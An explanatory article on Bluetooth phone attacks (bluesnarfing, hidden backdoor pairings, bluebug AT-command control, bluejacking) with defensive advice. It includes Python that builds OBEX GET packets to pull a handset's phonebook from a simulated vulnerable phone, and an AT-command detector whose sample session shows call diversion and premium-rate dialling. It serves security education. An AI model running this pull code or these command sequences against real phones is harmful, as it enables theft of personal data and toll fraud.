Mobile Phones: Bluesnarfing
Bluesnarfing
Everyone is aware of the attraction of mobile phones, as physical devices, to thieves. But modern mobile phones are also powerful multi-function electronic devices, often combining a telephone, a music player and an electronic organizer. They can hold a great deal of valuable information (including sensitive personal information) and have many ways of transferring it to other mobiles and to computers. In this article I am going to bring to your attention just one of those connection methods, one that can be vulnerable to attack if you're not careful: Bluetooth.
Bluetooth
Bluetooth is a specification for short-range wireless personal area networks that allows devices such as mobile phones, laptops, PCs, printers, digital cameras and video game consoles to connect and exchange information over a short-range radio link. The band it uses (2.4 GHz ISM) is licence-exempt in every country of the world, so a Bluetooth device can be used anywhere without a radio licence. The link itself is only as secure as the pairing and the software at each end, as the rest of this article shows.
The Bluetooth specification was developed in 1994 by Sven Mattisson and Jaap Haartsen, who were working for Ericsson Mobile Platforms in Lund, Sweden. It is now a global standard maintained by the Bluetooth Special Interest Group (SIG), which was announced on May 20 1998. Because of its Scandinavian origins, Bluetooth was named after a Danish king of the late 900s, Harald Bluetooth, who is known for uniting previously warring tribes of Denmark (including Scania, now part of Sweden, where the technology was invented) and Norway. The logo merges the Nordic runes corresponding to the modern Latin H and B, haglaz and berkanan, into a bind rune; it also resembles a capital B for 'Bluetooth' merged with an asterisk-like symbol standing for a network.
Most of the latest mobile phones include Bluetooth built in, as this allows the handset to communicate with computers, with other mobile phones and with accessories such as headsets. Bluetooth links can also connect a mobile phone to a broadband connection so that the mobile can work as an internet phone.
Bluetooth Vulnerabilities — Bluesnarfing
Bluesnarfing is defined as 'the unauthorized access of information from a wireless device through a Bluetooth connection'. Any device with its Bluetooth radio turned on and set to "discoverable" (able to be found by other Bluetooth devices in range) can be located and probed, and a handset with vulnerable firmware can then have its data pulled without the owner's knowledge. This makes mobile phones particularly exposed, especially when they are left discoverable because they are being used with Bluetooth earpieces, are communicating with other Bluetooth devices, or are connected to PCs or laptops over Bluetooth.
Normally a user 'beams' his or her business card to another user: the handset pushes a vCard using OBEX, the object exchange protocol that runs over Bluetooth, much as a client pushes data to a server. In a SNARF attack, instead of pushing a business card to the other device, the attacker pulls data with an OBEX 'get' request for files with well-known names, such as the phonebook file (telecom/pb.vcf) or the calendar file (telecom/cal.vcs); a vulnerable handset serves them without asking for pairing or confirmation. This is normally only possible if the device is in "discoverable" or "visible" mode, but there are tools available on the Internet that allow even this safety net to be bypassed.
To achieve this the bluesnarfing software needs to address the target by its unique 48-bit Bluetooth device address (not its friendly name), which a non-discoverable device does not advertise. Software such as RedFang has been written to find it by brute force: there are 2^48 (281,474,976,710,656) possible addresses, and although the upper 24 bits are a manufacturer identifier that narrows the search, it can still take several hours to find any given device. Which is not to say that it isn't possible. Later releases of the Bluetooth specification (v1.2 and 2.0) tightened some of this, but the bluesnarf flaws themselves lay in individual handsets' firmware, so the practical fix is to ensure that the firmware for your phone is up to date. Also, if you're not using Bluetooth then make certain that it is turned off, as then there is no possibility of an attack over it. Some manufacturers, such as Motorola, make their phones discoverable for only 60 seconds, while the handset is searching for a Bluetooth device to connect to.
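The 'push' versus 'pull' distinction above is easiest to see at the byte level. The following is an added example (not code from the original article or from any of the tools it names): it builds the OBEX CONNECT and GET packets a SNARF attack sends for telecom/pb.vcf, and runs them against a toy in-memory handset that stands in for the phone's OBEX service. The handset, its phonebook contents and the require_pairing switch (which models corrected firmware that refuses a GET from an unpaired device) are all constructed for illustration.

```python
"""OBEX 'pull' as used by a SNARF attack, exchanged with a simulated handset.

Added example, not from the original article. The Handset class and its
phonebook data are constructed stand-ins for a phone's OBEX service.
"""
import struct

# OBEX opcodes / response codes (final bit 0x80 set)
CONNECT, GET, DISCONNECT = 0x80, 0x83, 0x81
SUCCESS, UNAUTHORIZED, NOT_FOUND = 0xA0, 0xC1, 0xC4
# Header ids: top two bits give the encoding (00 unicode, 01 bytes, 10 one byte, 11 four bytes)
HDR_NAME, HDR_TYPE, HDR_END_OF_BODY = 0x01, 0x42, 0x49


def _hdr(hid, payload):
    """Length-prefixed header: id, 2-byte big-endian total length, payload."""
    return struct.pack(">BH", hid, 3 + len(payload)) + payload


def _packet(opcode, body):
    return struct.pack(">BH", opcode, 3 + len(body)) + body


def obex_connect(max_packet=0x2000):
    # CONNECT carries version 1.0, flags and max packet length before any headers
    return _packet(CONNECT, struct.pack(">BBH", 0x10, 0x00, max_packet))


def obex_get(name, mime_type):
    """The 'pull': a GET naming the object, instead of a PUT offering one."""
    hdrs = _hdr(HDR_NAME, name.encode("utf-16-be") + b"\x00\x00")
    hdrs += _hdr(HDR_TYPE, mime_type.encode("ascii") + b"\x00")
    return _packet(GET, hdrs)


def parse_headers(data):
    """Decode a run of OBEX headers into {header_id: value}."""
    out, i = {}, 0
    while i < len(data):
        hid = data[i]
        kind = hid >> 6
        if kind in (0, 1):
            (length,) = struct.unpack(">H", data[i + 1:i + 3])
            payload = data[i + 3:i + length]
            if kind == 0:
                payload = payload.decode("utf-16-be").rstrip("\x00")
            i += length
        elif kind == 2:
            payload, i = data[i + 1], i + 2
        else:
            (payload,) = struct.unpack(">I", data[i + 1:i + 5])
            i += 5
        out[hid] = payload
    return out


class Handset:
    """Toy OBEX server. require_pairing=False models the vulnerable firmware."""
    OBJECTS = {  # constructed sample data
        "telecom/pb.vcf": b"BEGIN:VCARD\r\nN:Doe;Jane\r\nTEL:+15551234567\r\nEND:VCARD\r\n",
        "telecom/cal.vcs": b"BEGIN:VCALENDAR\r\nEND:VCALENDAR\r\n",
    }

    def __init__(self, require_pairing, paired=False):
        self.require_pairing, self.paired = require_pairing, paired

    def handle(self, pkt):
        opcode, length = struct.unpack(">BH", pkt[:3])
        assert length == len(pkt), "truncated OBEX packet"
        if opcode == CONNECT:
            return _packet(SUCCESS, pkt[3:7])  # echo version/flags/max length
        if opcode == GET:
            if self.require_pairing and not self.paired:
                return _packet(UNAUTHORIZED, b"")
            name = parse_headers(pkt[3:]).get(HDR_NAME)
            if name not in self.OBJECTS:
                return _packet(NOT_FOUND, b"")
            return _packet(SUCCESS, _hdr(HDR_END_OF_BODY, self.OBJECTS[name]))
        return _packet(SUCCESS, b"")


def snarf(handset, name, mime_type="text/x-vcard"):
    """Attacker side: CONNECT, GET the named object, DISCONNECT. Bytes or None."""
    code = handset.handle(obex_connect())[0]
    if code != SUCCESS:
        return None
    resp = handset.handle(obex_get(name, mime_type))
    handset.handle(_packet(DISCONNECT, b""))
    if resp[0] != SUCCESS:
        return None
    return parse_headers(resp[3:]).get(HDR_END_OF_BODY)


if __name__ == "__main__":
    print("vulnerable:", snarf(Handset(require_pairing=False), "telecom/pb.vcf"))
    print("fixed:     ", snarf(Handset(require_pairing=True), "telecom/pb.vcf"))
```

Against the vulnerable handset the GET returns the whole phonebook with no pairing step at all; against the corrected one the same request gets 0xC1 Unauthorized until the attacker's device is actually paired, which is exactly the confirmation prompt the owner would notice.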
Bluetooth Vulnerabilities — Backdoor Attack
The backdoor attack involves establishing a trust relationship through a Bluetooth device's 'pairing' mechanism and then arranging that the attacker's device no longer appears in the target's list of paired devices. Unless the owner happens to be watching the handset at the precise moment a connection is made, they are unlikely to notice anything untoward, and the attacker is free to use any resource that a trusted relationship with that device grants. This means that not only can data be retrieved from the phone, but other services, such as modems and Internet, WAP and GPRS gateways, may be used without the owner's knowledge or consent.
To remove a backdoor you have to remove every device from the list of paired devices, and since the attacker's entry is hidden from that list the only reliable way to do so is a 'factory reset' of the phone, which clears the stored pairings but also erases all your other data. Once again, if your Bluetooth connection is not on you cannot be attacked this way.
Bluetooth Vulnerabilities — Bluebug Attack
The bluebug attack opens a serial-profile connection to the phone, which gives full access to the handset's AT command set. That can then be driven with standard off-the-shelf tools, such as PPP for networking and gnokii for messaging, contact management, diverts and placing calls. With this, it is possible to make the phone call premium-rate numbers, send SMS messages, read SMS messages, connect to data services such as the Internet, and even listen to conversations in the vicinity of the phone. The last is done by having the phone place a voice call over the GSM network to a number the attacker controls, so the listening post can be anywhere in the world, and Bluetooth access is needed only for the few seconds it takes to set the call up. Call-forwarding diverts can also be configured so that the owner's incoming calls are intercepted, either to provide a channel for calls to more expensive destinations or for identity theft by impersonating the victim.
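What 'full access to the AT command set' means in practice is a handful of standard GSM modem commands: ATD to dial, AT+CCFC to set a divert, AT+CMGS/AT+CMGR to send and read SMS, AT+CPBR to read the phonebook. The following added example (not from the original article or from gnokii) classifies the commands in a serial-profile session the way a monitoring tool might, flagging the actions the bluebug scenario depends on. The session log is constructed, and the premium-rate check is a UK-style heuristic (numbers beginning 09, or +44 9 in international form) that is an assumption rather than a general rule.

```python
"""Classify AT commands seen on a phone's serial profile, as a bluebug attacker issues them.

Added example, not from the original article. SESSION is constructed, and
is_premium_rate() is a UK-style heuristic assumed for illustration.
"""
import re

# (pattern, action, severity) for the standard GSM AT commands the bluebug scenario uses
AT_RULES = [
    (re.compile(r"^ATD\*99(?:\*\*\*\d)?#", re.I), "gprs-data-connection", "medium"),
    (re.compile(r"^ATD([+\d]+);$", re.I), "voice-call", "high"),        # trailing ';' = voice
    (re.compile(r"^ATD([+\d]+)$", re.I), "data-call", "medium"),
    (re.compile(r'^AT\+CCFC=(\d),(\d)(?:,"?([+\d]+)"?)?', re.I), "call-forwarding", "high"),
    (re.compile(r"^AT\+CMGS=", re.I), "sms-send", "high"),
    (re.compile(r"^AT\+CMGR=", re.I), "sms-read", "medium"),
    (re.compile(r"^AT\+CPBR=", re.I), "phonebook-read", "medium"),
]
SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2}


def is_premium_rate(number):
    """Assumed UK convention: 09xx domestically, +44 9xx internationally."""
    digits = number.replace(" ", "")
    return digits.startswith("09") or digits.startswith("+449")


def classify(cmd):
    """Map one AT command line to an action and severity."""
    cmd = cmd.strip()
    for pattern, action, severity in AT_RULES:
        m = pattern.match(cmd)
        if not m:
            continue
        finding = {"command": cmd, "action": action, "severity": severity}
        if action == "voice-call" and is_premium_rate(m.group(1)):
            finding["action"] = "premium-rate-call"
        if action == "call-forwarding":
            reason, mode, number = m.group(1), m.group(2), m.group(3)
            finding["divert_to"] = number
            # +CCFC reason 0 = unconditional, mode 3 = register the divert
            finding["unconditional"] = (reason == "0" and mode == "3")
        return finding
    return {"command": cmd, "action": "other", "severity": "low"}


def audit_session(lines):
    """Classify every AT line in a session; return the findings and the worst severity."""
    findings = [classify(l) for l in lines if l.strip().upper().startswith("AT")]
    worst = max((SEVERITY_RANK[f["severity"]] for f in findings), default=0)
    return findings, [k for k, v in SEVERITY_RANK.items() if v == worst][0]


# Constructed session: phonebook dump, read an SMS, divert all calls, dial a premium number
SESSION = [
    "AT",
    "AT+CPBR=1,250",
    "AT+CMGF=1",
    "AT+CMGR=1",
    'AT+CCFC=0,3,"+449051234567"',
    "ATD09051234567;",
]

if __name__ == "__main__":
    findings, worst = audit_session(SESSION)
    for f in findings:
        print(f["severity"].upper().ljust(6), f["action"].ljust(22), f["command"])
    print("worst severity:", worst)
```

The two high-severity lines are the ones that cost the victim money or hijack their calls: an unconditional divert to an attacker-chosen number and a voice call to a premium-rate number. Nothing in the session needs more than a few seconds of Bluetooth access, which is why the article stresses turning the radio off rather than hoping to catch the connection.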
Bluetooth Vulnerabilities — Bluejacking
Bluejacking, strictly speaking, is the sending of unsolicited messages to nearby Bluetooth devices, usually by pushing a business card (vCard) whose name field carries the message; it needs no pairing and, by itself, gives the sender no access to the phone. The danger is what can follow. The push uses the same object-exchange mechanism whose whole purpose is to let devices exchange, update and synchronise data, the raison d'être of Bluetooth, and a recipient who responds to the message by accepting a pairing request from the 'bluejacker' turns a harmless prank into a trusted relationship. If that happens, the data on the target device becomes available to the initiator, including phone books, calendars, pictures and text messages. So for bluejacking to do any real harm you have to actively accept the connection from the second device. If you did not initiate that connection and you are not aware of anyone trusted attempting to connect to you, 'just say no'.
